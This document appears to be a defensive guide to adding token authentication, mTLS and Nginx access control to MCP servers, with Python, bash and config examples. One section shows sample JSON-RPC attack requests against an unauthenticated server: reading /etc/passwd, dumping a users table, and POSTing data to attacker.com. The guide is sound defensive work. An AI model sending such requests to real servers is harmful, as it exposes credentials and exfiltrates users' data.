MCP Authentication Gaps: Securing MCP Server Authentication
A defense-focused guide to understanding authentication weaknesses in MCP server deployments -- 38% of scanned servers lack any authentication -- and implementing robust token-based auth, mTLS, and middleware-based access control.
The MCP specification deliberately leaves authentication as an implementation concern rather than a protocol requirement. This design decision -- intended to reduce adoption friction -- has resulted in a security landscape where 38% of the 500+ publicly accessible MCP servers scanned by the VulnerableMCP project implement no authentication whatsoever.
For MCP servers accessible over HTTP+SSE, the absence of authentication means that anyone who can reach the server endpoint can list its tools, invoke them, and receive results. For stdio-based servers running locally, there is no authentication step at all: whichever process spawns the server owns its stdin/stdout pipes and therefore has full control of it.
Understanding the Authentication Gap
Why MCP Has No Built-In Authentication
The MCP protocol specification (version 2024-11-05) defines the message format, capability negotiation, and tool calling semantics, but explicitly does not define:
- How clients prove their identity to servers
- How servers validate that a client is authorized to call specific tools
- How transport channels are secured against eavesdropping or tampering
- How sessions are managed or revoked
MCP Protocol Layer (JSON-RPC 2.0):
┌────────────────────────────────────────┐
│  initialize / tools/list / tools/call  │ ← No auth fields in protocol
└────────────────┬───────────────────────┘
                 │
Transport Layer: │                         ← Auth must be implemented here
┌────────────────┴───────────────────────┐
│ stdio (local)  │ HTTP+SSE (network)    │
│ No auth        │ Auth is "optional"    │
│ Process-level  │ TLS recommended       │
│ isolation only │ but not required      │
└────────────────────────────────────────┘
This layering means that security is entirely dependent on what the server implementer builds into the transport layer -- and most MCP server templates and tutorials ship without any authentication code.
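To make the layering concrete, the following minimal sketch builds a `tools/call` request the way an HTTP client might. The endpoint URL, the token value, and the helper name `build_tool_call` are assumptions for illustration only. The point is that the JSON-RPC body has no field for credentials, so they have to travel in transport-level headers.

```python
import json
import urllib.request


def build_tool_call(url: str, token: str, tool: str, arguments: dict) -> urllib.request.Request:
    """Build (but do not send) an HTTP request carrying a JSON-RPC tools/call."""
    body = {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "tools/call",
        "params": {"name": tool, "arguments": arguments},
    }
    return urllib.request.Request(
        url,
        data=json.dumps(body).encode("utf-8"),
        headers={
            "Content-Type": "application/json",
            # The credential lives here, outside the JSON-RPC message.
            "Authorization": f"Bearer {token}",
        },
        method="POST",
    )


# Hypothetical endpoint and token, used only to inspect the request.
request = build_tool_call(
    "https://mcp.example.internal/messages/",
    "mcp_example_token",
    "read_file",
    {"path": "notes.txt"},
)
message = json.loads(request.data)
print(sorted(message))                      # top-level JSON-RPC fields only
print(request.get_header("Authorization"))  # credential carried by the transport
```

If the server ignores the `Authorization` header, the same body is accepted from any caller, which is the gap the rest of this guide addresses.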
Transport Types and Their Security Properties
stdio Transport:
┌──────────┐   stdin/stdout   ┌──────────┐
│ MCP Host │ ◄──────────────► │   MCP    │
│ (Client) │     (pipes)      │  Server  │
└──────────┘                  └──────────┘
  Security: Process isolation only
  Auth:     None (whoever spawns the process controls it)
  Threats:  Local privilege escalation, supply chain
            (malicious package replaces server binary)
HTTP+SSE Transport:
┌──────────┐   HTTP POST/SSE    ┌──────────┐
│   MCP    │ ◄────────────────► │   MCP    │
│  Client  │     (network)      │  Server  │
└──────────┘                    └──────────┘
  Security: Depends entirely on implementation
  Auth:     Not required by spec -- must be added
  Threats:  Unauthorized access, MITM, session hijacking,
            credential theft, denial of service
Streamable HTTP Transport (2025+):
┌──────────┐    HTTP streams    ┌──────────┐
│   MCP    │ ◄────────────────► │   MCP    │
│  Client  │  (bidirectional)   │  Server  │
└──────────┘                    └──────────┘
  Security: Same as HTTP+SSE but with session management
  Auth:     OAuth2 recommended but not enforced
  Threats:  Same as HTTP+SSE plus session fixation
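One way to blunt the session hijacking and session fixation threats listed above is for the server to mint every session identifier itself and bind it to the identity that authenticated when the session was created. The sketch below is illustrative only: `SessionRegistry` and its method names are hypothetical and are not part of the MCP SDK.

```python
import secrets
import time


class SessionRegistry:
    """Hypothetical in-memory registry binding session IDs to client identities."""

    def __init__(self, ttl_seconds: float = 3600.0):
        self._ttl = ttl_seconds
        # session_id -> (owning client identity, expiry on the monotonic clock)
        self._sessions: dict[str, tuple[str, float]] = {}

    def create(self, client_id: str) -> str:
        # The server always mints the ID; a client-supplied value is never adopted,
        # which is what defeats fixation.
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = (client_id, time.monotonic() + self._ttl)
        return session_id

    def validate(self, session_id: str, client_id: str) -> bool:
        record = self._sessions.get(session_id)
        if record is None:
            return False
        owner, expires_at = record
        if time.monotonic() >= expires_at:
            del self._sessions[session_id]
            return False
        # A valid session presented by a different authenticated client is rejected.
        return owner == client_id

    def revoke(self, session_id: str) -> None:
        self._sessions.pop(session_id, None)


registry = SessionRegistry(ttl_seconds=900)
sid = registry.create("agent-production")
print(registry.validate(sid, "agent-production"))
print(registry.validate(sid, "agent-staging"))
```

The design choice here is that a session ID alone is never sufficient: each request must still authenticate, and the session only counts when it belongs to that same identity.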
What Unauthenticated Access Enables
An attacker who reaches an unauthenticated MCP server can:
- Discover capabilities: Call tools/list to enumerate all available tools, their parameters, and descriptions
- Execute tools: Call tools/call with arbitrary parameters to invoke any registered tool
- Exfiltrate data: Use file-reading, database, or API tools to extract sensitive information
- Modify state: Use write tools to alter files, database records, or external systems
- Pivot further: Use the server's access to internal services as a lateral movement path
// An attacker can simply send JSON-RPC requests to an unauthenticated MCP server
// Step 1: Discover tools
{"jsonrpc": "2.0", "method": "tools/list", "id": 1}
// Step 2: Read sensitive files
{"jsonrpc": "2.0", "method": "tools/call", "id": 2,
 "params": {"name": "read_file", "arguments": {"path": "/etc/passwd"}}}
// Step 3: Access internal databases
{"jsonrpc": "2.0", "method": "tools/call", "id": 3,
 "params": {"name": "query_db", "arguments": {"query": "SELECT * FROM users"}}}
// Step 4: Exfiltrate via available tools
{"jsonrpc": "2.0", "method": "tools/call", "id": 4,
 "params": {"name": "http_request", "arguments": {
   "url": "https://attacker.com/collect",
   "method": "POST",
   "body": "stolen_data_here"
 }}}
Implementing Token-Based Authentication for MCP Servers
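The most straightforward defense is to add token-based authentication to HTTP+SSE MCP servers. The following sections walk through an implementation: an authentication provider, a token management script, and middleware that wires the provider into a server.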
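The core idea fits in a few lines: issue a random token once, keep only its SHA-256 hash on the server, and compare hashes when a token is presented. The sketch below is a minimal illustration under those assumptions. The function names `issue_token` and `verify_token` are hypothetical, and the `mcp_` prefix simply mirrors the token format used later in this guide.

```python
import hashlib
import hmac
import secrets


def issue_token() -> tuple[str, str]:
    """Return (raw_token, token_hash); only the hash should be persisted."""
    raw_token = "mcp_" + secrets.token_urlsafe(32)
    token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
    return raw_token, token_hash


def verify_token(presented: str, stored_hashes: set[str]) -> bool:
    """Check a presented token against the stored hashes."""
    candidate = hashlib.sha256(presented.encode()).hexdigest()
    matched = False
    for stored in stored_hashes:
        # compare_digest runs in time independent of where the strings differ;
        # every stored hash is checked so a match does not end the loop early.
        matched |= hmac.compare_digest(candidate, stored)
    return matched


raw, digest = issue_token()
store = {digest}                         # what the server keeps
print(verify_token(raw, store))          # the real token is accepted
print(verify_token(raw + "x", store))    # anything else is rejected
```

Because only hashes are stored, a leaked token store does not directly reveal usable credentials, which is why a raw token can be shown to the operator only once at creation time.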
Authentication Middleware
"""
MCP Authentication Middleware
Implements Bearer token and API key authentication for MCP HTTP+SSE servers.
"""
import os
import hashlib
import time
import json
import secrets
import logging
from dataclasses import dataclass
from typing import Optional
from datetime import datetime, timezone

logger = logging.getLogger("mcp.auth")


def _parse_utc(value: str) -> datetime:
    """Parse an ISO 8601 timestamp; a trailing "Z" or a missing offset means UTC."""
    parsed = datetime.fromisoformat(value.replace("Z", "+00:00"))
    if parsed.tzinfo is None:
        parsed = parsed.replace(tzinfo=timezone.utc)
    return parsed


@dataclass
class AuthToken:
    """Represents an authenticated API token."""
    token_id: str
    client_name: str
    scopes: set[str]  # Allowed tool names or "*" for all
    created_at: datetime
    expires_at: Optional[datetime]
    rate_limit: int = 100  # Calls per minute
    is_active: bool = True


@dataclass
class AuthResult:
    """Result of an authentication attempt."""
    authenticated: bool
    token: Optional[AuthToken] = None
    error: Optional[str] = None
    client_ip: Optional[str] = None


class MCPAuthProvider:
    """
    Authentication provider for MCP servers.
    Supports Bearer tokens and API keys, both verified against stored
    SHA-256 hashes.
    """

    def __init__(self, token_store_path: str = "/var/mcp/auth/tokens.json"):
        self.token_store_path = token_store_path
        self.tokens: dict[str, AuthToken] = {}
        self._rate_tracker: dict[str, list[float]] = {}
        self._load_tokens()

    def _load_tokens(self):
        """Load token definitions from the JSON store (token hashes only)."""
        if not os.path.exists(self.token_store_path):
            logger.warning("Token store not found at %s", self.token_store_path)
            return
        with open(self.token_store_path, 'r') as f:
            data = json.load(f)
        for entry in data.get("tokens", []):
            token = AuthToken(
                token_id=entry["id"],
                client_name=entry["client_name"],
                scopes=set(entry.get("scopes", ["*"])),
                created_at=_parse_utc(entry["created_at"]),
                expires_at=(
                    _parse_utc(entry["expires_at"])
                    if entry.get("expires_at") else None
                ),
                rate_limit=entry.get("rate_limit", 100),
                is_active=entry.get("is_active", True),
            )
            # Key is the SHA-256 hash of the actual token value;
            # the raw token is never stored.
            self.tokens[entry["token_hash"]] = token

    def authenticate(self, request_headers: dict,
                     client_ip: str = "unknown") -> AuthResult:
        """
        Authenticate an incoming MCP request.
        Checks for Bearer token in Authorization header or
        X-API-Key header.
        """
        # Header names are case-insensitive, and frameworks such as Starlette
        # expose them lowercased, so normalize before looking anything up.
        headers = {k.lower(): v for k, v in request_headers.items()}
        auth_header = headers.get("authorization", "")
        api_key = headers.get("x-api-key", "")
        raw_token = None
        if auth_header.startswith("Bearer "):
            raw_token = auth_header[7:]
        elif api_key:
            raw_token = api_key
        if not raw_token:
            logger.warning(
                "Authentication failed: no token provided from %s", client_ip
            )
            return AuthResult(
                authenticated=False,
                error="No authentication token provided",
                client_ip=client_ip,
            )

        # Hash the provided token and look up
        token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
        token_record = self.tokens.get(token_hash)
        if token_record is None:
            logger.warning(
                "Authentication failed: invalid token from %s", client_ip
            )
            return AuthResult(
                authenticated=False,
                error="Invalid authentication token",
                client_ip=client_ip,
            )

        # Check token status
        if not token_record.is_active:
            return AuthResult(
                authenticated=False,
                error="Token has been revoked",
                client_ip=client_ip,
            )
        # Compare timezone-aware values; mixing naive and aware datetimes
        # raises TypeError.
        if (token_record.expires_at and
                datetime.now(timezone.utc) > token_record.expires_at):
            return AuthResult(
                authenticated=False,
                error="Token has expired",
                client_ip=client_ip,
            )

        # Check rate limit
        if not self._check_rate_limit(token_record.token_id,
                                      token_record.rate_limit):
            return AuthResult(
                authenticated=False,
                token=token_record,
                error="Rate limit exceeded",
                client_ip=client_ip,
            )

        logger.info(
            "Authenticated client '%s' (token: %s) from %s",
            token_record.client_name, token_record.token_id, client_ip,
        )
        return AuthResult(
            authenticated=True,
            token=token_record,
            client_ip=client_ip,
        )

    def authorize_tool_call(self, auth_result: AuthResult,
                            tool_name: str) -> bool:
        """Check if the authenticated client can call a specific tool."""
        if not auth_result.authenticated or auth_result.token is None:
            return False
        scopes = auth_result.token.scopes
        if "*" in scopes:
            return True
        return tool_name in scopes

    def _check_rate_limit(self, token_id: str, limit: int) -> bool:
        """Simple sliding window rate limiter."""
        now = time.time()
        window = self._rate_tracker.setdefault(token_id, [])
        # Remove entries older than 60 seconds
        self._rate_tracker[token_id] = [
            t for t in window if now - t < 60
        ]
        if len(self._rate_tracker[token_id]) >= limit:
            return False
        self._rate_tracker[token_id].append(now)
        return True

    @staticmethod
    def generate_token() -> tuple[str, str]:
        """
        Generate a new API token.
        Returns (raw_token, token_hash) -- only store the hash.
        """
        raw_token = f"mcp_{secrets.token_urlsafe(32)}"
        token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
        return raw_token, token_hash
Token Management Script
#!/bin/bash
# mcp-token-manager.sh -- Generate and manage MCP server authentication tokens
# Usage: ./mcp-token-manager.sh generate|revoke|list [options]
set -euo pipefail
TOKEN_STORE="/var/mcp/auth/tokens.json"
BACKUP_DIR="/var/mcp/auth/backups"
ensure_store_exists() {
mkdir -p "$(dirname "$TOKEN_STORE")"
mkdir -p "$BACKUP_DIR"
chmod 700 "$(dirname "$TOKEN_STORE")"
if [ ! -f "$TOKEN_STORE" ]; then
echo '{"tokens": []}' > "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
fi
}
generate_token() {
local client_name="${1:?Usage: generate <client_name> [scopes] [expiry_days]}"
local scopes="${2:-*}"
local expiry_days="${3:-90}"
ensure_store_exists
# Generate secure random token
local raw_token="mcp_$(openssl rand -base64 32 | tr -d '/+=' | head -c 43)"
local token_hash
token_hash=$(echo -n "$raw_token" | sha256sum | awk '{print $1}')
local token_id
token_id=$(openssl rand -hex 8)
local created_at
created_at=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
local expires_at
expires_at=$(date -u -d "+${expiry_days} days" +"%Y-%m-%dT%H:%M:%SZ")
# Back up current store
cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
# Add token to store (store only the hash)
local tmp
tmp=$(mktemp)
jq --arg id "$token_id" \
--arg name "$client_name" \
--arg hash "$token_hash" \
--arg scopes "$scopes" \
--arg created "$created_at" \
--arg expires "$expires_at" \
'.tokens += [{
"id": $id,
"client_name": $name,
"token_hash": $hash,
"scopes": ($scopes | split(",")),
"created_at": $created,
"expires_at": $expires,
"rate_limit": 100,
"is_active": true
}]' "$TOKEN_STORE" > "$tmp"
mv "$tmp" "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
echo "============================================"
echo " MCP Token Generated Successfully"
echo "============================================"
echo " Token ID: $token_id"
echo " Client: $client_name"
echo " Scopes: $scopes"
echo " Expires: $expires_at"
echo ""
echo " RAW TOKEN (save this -- it cannot be recovered):"
echo " $raw_token"
echo "============================================"
}
revoke_token() {
local token_id="${1:?Usage: revoke <token_id>}"
ensure_store_exists
cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
local tmp
tmp=$(mktemp)
jq --arg id "$token_id" \
'(.tokens[] | select(.id == $id)).is_active = false' \
"$TOKEN_STORE" > "$tmp"
mv "$tmp" "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
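echo "Token $token_id has been revoked."
echo "Restart the MCP server (or reload its token store) for this to take effect; the provider reads tokens.json only at startup."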
}
list_tokens() {
ensure_store_exists
echo "Active MCP Tokens:"
echo "-------------------"
jq -r '.tokens[] | select(.is_active == true) |
"ID: \(.id) Client: \(.client_name) Scopes: \(.scopes | join(",")) Expires: \(.expires_at)"' \
"$TOKEN_STORE"
}
case "${1:-help}" in
generate) generate_token "${@:2}" ;;
revoke) revoke_token "${@:2}" ;;
list) list_tokens ;;
*) echo "Usage: $0 generate|revoke|list [options]" ;;
esac
Integrating Auth Middleware with an MCP Server
"""
Example: MCP server with authentication middleware using the Python SDK.
"""
from mcp import types
from mcp.server import Server
from mcp.server.sse import SseServerTransport
from starlette.applications import Starlette
from starlette.routing import Route, Mount
from starlette.requests import Request
from starlette.responses import JSONResponse, Response
from starlette.middleware import Middleware
from starlette.middleware.base import BaseHTTPMiddleware
import uvicorn

# Assumes the authentication provider above is saved as mcp_auth.py
from mcp_auth import MCPAuthProvider


class MCPAuthMiddleware(BaseHTTPMiddleware):
    """Starlette middleware that enforces MCP authentication."""
    # Paths that don't require authentication
    PUBLIC_PATHS = {"/health", "/ready"}

    def __init__(self, app, auth_provider: MCPAuthProvider):
        super().__init__(app)
        self.auth = auth_provider

    async def dispatch(self, request: Request, call_next):
        # Skip auth for health checks
        if request.url.path in self.PUBLIC_PATHS:
            return await call_next(request)

        # Authenticate the request
        client_ip = request.client.host if request.client else "unknown"
        auth_result = self.auth.authenticate(
            dict(request.headers), client_ip
        )
        if not auth_result.authenticated:
            return JSONResponse(
                {
                    "jsonrpc": "2.0",
                    "error": {
                        "code": -32001,
                        "message": auth_result.error,
                    },
                    # JSON-RPC 2.0 responses carry an id; null when the
                    # request id could not be determined.
                    "id": None,
                },
                status_code=401,
                headers={"WWW-Authenticate": "Bearer"},
            )

        # Attach auth context to request state for tool-level authorization
        request.state.auth = auth_result
        return await call_next(request)


# Create the MCP server
server = Server("secure-mcp-server")
auth_provider = MCPAuthProvider("/var/mcp/auth/tokens.json")


# Define tools with authorization checks
@server.list_tools()
async def list_tools() -> list[types.Tool]:
    return [
        types.Tool(
            name="read_file",
            description="Read a file from the workspace",
            inputSchema={
                "type": "object",
                "properties": {"path": {"type": "string"}},
                "required": ["path"],
            },
        ),
        types.Tool(
            name="query_database",
            description="Run a read-only database query",
            inputSchema={
                "type": "object",
                "properties": {"query": {"type": "string"}},
                "required": ["query"],
            },
        ),
    ]


@server.call_tool()
async def call_tool(name: str, arguments: dict):
    # This handler does not receive the Starlette request, so
    # request.state.auth is not directly visible here. Tool-level
    # authorization (auth_provider.authorize_tool_call) has to be enforced
    # wherever the auth context is available, for example in the middleware.
    # This is a simplified example.
    if name == "read_file":
        path = arguments["path"]
        # ... validated file reading logic ...
        return [types.TextContent(type="text", text=f"Contents of {path}")]
    elif name == "query_database":
        query = arguments["query"]
        # ... validated query logic ...
        return [types.TextContent(type="text", text=f"Query results for: {query}")]
    raise ValueError(f"Unknown tool: {name}")


# Wire up the Starlette app with auth middleware
sse = SseServerTransport("/messages/")


async def handle_sse(request: Request):
    async with sse.connect_sse(
        request.scope, request.receive, request._send
    ) as streams:
        await server.run(
            streams[0], streams[1], server.create_initialization_options()
        )
    # Return an empty response so Starlette has something to send
    # once the client disconnects.
    return Response()


app = Starlette(
    routes=[
        Route("/sse", endpoint=handle_sse),
        Mount("/messages/", app=sse.handle_post_message),
    ],
    middleware=[
        Middleware(MCPAuthMiddleware, auth_provider=auth_provider),
    ],
)

if __name__ == "__main__":
    uvicorn.run(
        app,
        host="127.0.0.1",
        port=8443,
        ssl_certfile="/var/mcp/certs/server.crt",
        ssl_keyfile="/var/mcp/certs/server.key",
    )
Configuring mTLS for High-Security Deployments
For environments handling sensitive data or operating in regulated industries, mutual TLS provides strong cryptographic authentication where both client and server present certificates.
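To make "both client and server present certificates" concrete from the client's side, here is a minimal sketch using Python's standard `ssl` module. The helper name `make_client_context` is hypothetical, and the file paths in the usage comment are assumptions that match the locations used by the scripts later in this section.

```python
import ssl
from typing import Optional


def make_client_context(cafile: Optional[str] = None,
                        certfile: Optional[str] = None,
                        keyfile: Optional[str] = None) -> ssl.SSLContext:
    """Build a TLS client context that verifies the server and, when a
    certificate is supplied, presents it for mutual TLS."""
    # create_default_context enables hostname checking and CERT_REQUIRED.
    # Passing cafile trusts that CA bundle (here, the private MCP CA).
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    if certfile:
        # The client's own certificate and key, presented during the handshake.
        ctx.load_cert_chain(certfile=certfile, keyfile=keyfile)
    return ctx


# Hypothetical usage once the CA and client certificate exist:
# ctx = make_client_context(
#     cafile="/var/mcp/ca/certs/ca.crt",
#     certfile="/var/mcp/ca/certs/agent-staging.crt",
#     keyfile="/var/mcp/ca/private/agent-staging.key",
# )
# urllib.request.urlopen("https://mcp-server:8443/sse", context=ctx)
ctx = make_client_context()
print(ctx.verify_mode == ssl.CERT_REQUIRED, ctx.check_hostname)
```

The server side mirrors this: it loads its own certificate, trusts the same CA, and sets its verify mode to require a client certificate.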
Certificate Authority Setup
#!/bin/bash
# setup-mcp-ca.sh -- Create a private CA for MCP mTLS authentication
set -euo pipefail
CA_DIR="/var/mcp/ca"
CERT_DAYS=365
CA_DAYS=3650
mkdir -p "${CA_DIR}"/{certs,private,crl,newcerts}
chmod 700 "${CA_DIR}/private"
touch "${CA_DIR}/index.txt"
echo 1000 > "${CA_DIR}/serial"
echo "[*] Generating CA private key..."
openssl genrsa -aes256 -out "${CA_DIR}/private/ca.key" 4096
chmod 400 "${CA_DIR}/private/ca.key"
echo "[*] Creating CA certificate..."
openssl req -new -x509 -days ${CA_DAYS} \
-key "${CA_DIR}/private/ca.key" \
-out "${CA_DIR}/certs/ca.crt" \
-subj "/C=US/ST=Security/O=MCP Security/CN=MCP Internal CA" \
-addext "basicConstraints=critical,CA:TRUE,pathlen:0" \
-addext "keyUsage=critical,keyCertSign,cRLSign"
echo "[*] Generating MCP server certificate..."
openssl genrsa -out "${CA_DIR}/private/mcp-server.key" 2048
chmod 400 "${CA_DIR}/private/mcp-server.key"
openssl req -new \
-key "${CA_DIR}/private/mcp-server.key" \
-out "${CA_DIR}/certs/mcp-server.csr" \
-subj "/C=US/ST=Security/O=MCP Security/CN=mcp-server"
openssl x509 -req -days ${CERT_DAYS} \
-in "${CA_DIR}/certs/mcp-server.csr" \
-CA "${CA_DIR}/certs/ca.crt" \
-CAkey "${CA_DIR}/private/ca.key" \
-CAcreateserial \
-out "${CA_DIR}/certs/mcp-server.crt" \
-extfile <(cat <<-EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth
subjectAltName = DNS:mcp-server,DNS:mcp-server.internal,DNS:mcp.internal.example.com,IP:127.0.0.1
EXTEOF
)
echo "[+] CA and server certificates created."
echo " CA cert: ${CA_DIR}/certs/ca.crt"
echo " Server cert: ${CA_DIR}/certs/mcp-server.crt"
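echo " Server key: ${CA_DIR}/private/mcp-server.key"
# Note: the server and Nginx configurations in this guide also expect a CRL at
# ${CA_DIR}/crl/revoked.pem. This script does not create one; generate it
# (for example with `openssl ca -gencrl` and a matching openssl.cnf) before
# enabling CRL checks.

#!/bin/bash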
# generate-mcp-client-cert.sh -- Generate a client certificate for MCP mTLS
# Usage: ./generate-mcp-client-cert.sh <client_name>
set -euo pipefail
CA_DIR="/var/mcp/ca"
CLIENT_NAME="${1:?Usage: generate-mcp-client-cert.sh <client_name>}"
CERT_DAYS=90
echo "[*] Generating client key for '${CLIENT_NAME}'..."
openssl genrsa -out "${CA_DIR}/private/${CLIENT_NAME}.key" 2048
chmod 400 "${CA_DIR}/private/${CLIENT_NAME}.key"
echo "[*] Creating CSR..."
openssl req -new \
-key "${CA_DIR}/private/${CLIENT_NAME}.key" \
-out "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
-subj "/C=US/ST=Security/O=MCP Security/CN=${CLIENT_NAME}"
echo "[*] Signing with CA..."
openssl x509 -req -days ${CERT_DAYS} \
-in "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
-CA "${CA_DIR}/certs/ca.crt" \
-CAkey "${CA_DIR}/private/ca.key" \
-CAcreateserial \
-out "${CA_DIR}/certs/${CLIENT_NAME}.crt" \
-extfile <(cat <<-EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature
extendedKeyUsage = clientAuth
EXTEOF
)
echo "[+] Client certificate created for '${CLIENT_NAME}'."
echo " Cert: ${CA_DIR}/certs/${CLIENT_NAME}.crt"
echo " Key: ${CA_DIR}/private/${CLIENT_NAME}.key"
echo " Expires in ${CERT_DAYS} days"
echo ""
echo " To use with curl:"
echo " curl --cert ${CA_DIR}/certs/${CLIENT_NAME}.crt \\"
echo " --key ${CA_DIR}/private/${CLIENT_NAME}.key \\"
echo " --cacert ${CA_DIR}/certs/ca.crt \\"
echo " https://mcp-server:8443/sse"
mTLS-Enabled MCP Server Configuration
"""
MCP server with mTLS authentication.
Extracts client identity from the TLS certificate.
"""
import ssl
import logging
from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.routing import Route
import uvicorn

logger = logging.getLogger("mcp.mtls")

# Client certificate CN -> allowed tool scopes
CLIENT_PERMISSIONS = {
    "agent-production": {"*"},                       # Full access
    "agent-staging": {"read_file", "list_files"},    # Read-only
    "monitoring": {"health_check", "get_metrics"},   # Monitoring only
}


def create_ssl_context() -> ssl.SSLContext:
    """Create SSL context with mTLS configuration."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # Server certificate and key
    ctx.load_cert_chain(
        certfile="/var/mcp/ca/certs/mcp-server.crt",
        keyfile="/var/mcp/ca/private/mcp-server.key",
    )
    # Require client certificates signed by our CA
    ctx.load_verify_locations(cafile="/var/mcp/ca/certs/ca.crt")
    ctx.verify_mode = ssl.CERT_REQUIRED
    # Strong TLS configuration. set_ciphers() only governs TLS 1.2 and
    # below; with a TLS 1.3 minimum it is kept as a fallback setting.
    ctx.minimum_version = ssl.TLSVersion.TLSv1_3
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM")
    # Load CRL for revoked certificates
    ctx.load_verify_locations(cafile="/var/mcp/ca/crl/revoked.pem")
    # OR the flag in so the default verification flags are preserved
    ctx.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
    return ctx


async def extract_client_identity(request: Request) -> dict:
    """Extract client identity from the mTLS certificate."""
    # NOTE: the ASGI scope has no standard "transport" entry. This lookup
    # assumes a server or custom protocol class that injects the underlying
    # transport. Where that is not available, terminate mTLS at a reverse
    # proxy and forward the verified CN in a header instead.
    transport = request.scope.get("transport")
    if not transport:
        return {"authenticated": False, "error": "No transport"}
    peercert = transport.get_extra_info("peercert")
    if not peercert:
        return {"authenticated": False, "error": "No client certificate"}

    # Extract Common Name
    subject = dict(x[0] for x in peercert.get("subject", ()))
    client_cn = subject.get("commonName", "unknown")

    # Look up permissions
    scopes = CLIENT_PERMISSIONS.get(client_cn)
    if scopes is None:
        logger.warning("Unknown client CN: %s", client_cn)
        return {
            "authenticated": True,
            "authorized": False,
            "client_cn": client_cn,
            "error": "Client not in permissions table",
        }
    return {
        "authenticated": True,
        "authorized": True,
        "client_cn": client_cn,
        "scopes": scopes,
    }


async def handle_tool_call(request: Request):
    """Handle MCP tool calls with mTLS-based authorization."""
    identity = await extract_client_identity(request)
    if not identity.get("authenticated"):
        return JSONResponse({"error": "mTLS authentication failed"}, status_code=401)
    if not identity.get("authorized"):
        return JSONResponse({"error": "Client not authorized"}, status_code=403)

    # Parse JSON-RPC request
    body = await request.json()
    tool_name = body.get("params", {}).get("name", "")

    # Check tool-level authorization
    if "*" not in identity["scopes"] and tool_name not in identity["scopes"]:
        logger.warning(
            "Client %s attempted unauthorized tool call: %s",
            identity["client_cn"], tool_name,
        )
        return JSONResponse({
            "jsonrpc": "2.0",
            "error": {"code": -32003, "message": f"Not authorized for tool: {tool_name}"},
            "id": body.get("id"),
        }, status_code=403)

    # Process the authorized tool call
    logger.info("Authorized %s -> %s", identity["client_cn"], tool_name)
    # ... tool execution logic ...
    return JSONResponse({"jsonrpc": "2.0", "result": {"status": "ok"}, "id": body.get("id")})


app = Starlette(routes=[Route("/mcp", handle_tool_call, methods=["POST"])])

if __name__ == "__main__":
    # uvicorn.run() has no `ssl=` parameter and does not accept a prebuilt
    # SSLContext; it builds its own context from the ssl_* options below.
    # The TLS 1.3 minimum and CRL checks in create_ssl_context() therefore
    # need a server that accepts an SSLContext, or a fronting proxy.
    uvicorn.run(
        app,
        host="0.0.0.0",
        port=8443,
        ssl_certfile="/var/mcp/ca/certs/mcp-server.crt",
        ssl_keyfile="/var/mcp/ca/private/mcp-server.key",
        ssl_ca_certs="/var/mcp/ca/certs/ca.crt",
        ssl_cert_reqs=ssl.CERT_REQUIRED,
    )
Nginx Reverse Proxy with Authentication
For production deployments, place an Nginx reverse proxy in front of MCP servers:
# /etc/nginx/conf.d/mcp-server.conf
# Nginx reverse proxy for MCP server with authentication
upstream mcp_backend {
server 127.0.0.1:8080;
keepalive 32;
}
# Rate limiting zones
limit_req_zone $binary_remote_addr zone=mcp_init:10m rate=5r/m;
limit_req_zone $binary_remote_addr zone=mcp_tools:10m rate=30r/m;
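limit_conn_zone $binary_remote_addr zone=mcp_conn:10m;
# $ssl_client_s_dn_cn is not a built-in Nginx variable; derive it from the subject DN
map $ssl_client_s_dn $ssl_client_s_dn_cn {
default "";
"~(?:^|,)CN=(?<cn>[^,]+)" $cn;
}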
server {
listen 443 ssl http2;
server_name mcp.internal.example.com;
# TLS configuration
ssl_certificate /var/mcp/ca/certs/mcp-server.crt;
ssl_certificate_key /var/mcp/ca/private/mcp-server.key;
ssl_protocols TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers on;
# mTLS -- require client certificates
ssl_client_certificate /var/mcp/ca/certs/ca.crt;
ssl_verify_client on;
ssl_verify_depth 2;
ssl_crl /var/mcp/ca/crl/revoked.pem;
# Connection limits
limit_conn mcp_conn 10;
# Security headers
add_header X-Content-Type-Options nosniff always;
add_header X-Frame-Options DENY always;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
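# Health check (no token required; the TLS handshake still demands a client
# certificate because ssl_verify_client is on for the whole server block)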
location /health {
proxy_pass http://mcp_backend/health;
access_log off;
}
# SSE endpoint (initialization)
location /sse {
limit_req zone=mcp_init burst=3 nodelay;
# Pass client certificate info to backend
proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
proxy_set_header X-Client-Verified $ssl_client_verify;
proxy_set_header X-Client-Fingerprint $ssl_client_fingerprint;
# SSE-specific proxy settings
proxy_pass http://mcp_backend/sse;
proxy_http_version 1.1;
proxy_set_header Connection "";
proxy_buffering off;
proxy_cache off;
proxy_read_timeout 3600s;
proxy_send_timeout 3600s;
}
# Tool call endpoint
location /messages/ {
limit_req zone=mcp_tools burst=10 nodelay;
proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
proxy_set_header X-Client-Verified $ssl_client_verify;
proxy_pass http://mcp_backend/messages/;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
# Request body size limit
client_max_body_size 1m;
}
# Block everything else
location / {
return 404;
}
